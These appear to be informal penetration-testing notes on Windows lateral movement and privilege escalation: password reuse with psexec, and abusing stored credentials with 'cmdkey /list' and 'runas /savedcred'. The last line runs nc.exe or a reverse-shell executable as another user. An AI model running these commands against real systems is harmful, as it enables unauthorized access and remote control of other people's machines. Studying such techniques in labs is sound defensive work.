Try different authentication methods if we find them as well as juggle the password for every single user just in case we can do some lateral movement .
Try psexec because maybe we find a password for our current user but turns out that user reused his password to set up an administrator account
Windows has a runas command which allows users to run commands with the privileges of other users. This usually requires the knowledge of the other user’s password. However, Windows also allows users to save their credentials to the system, and these saved credentials can be used to bypass this requirement.
To verify these are correct we can run the command cmdkey /list and if it doesnt show anything we need to run the savedcred.bat to restore them and rerun the command.
runas /savedcred /user:<nameo f the credentiasl> C:\path\to\nc.exe or reverse.exe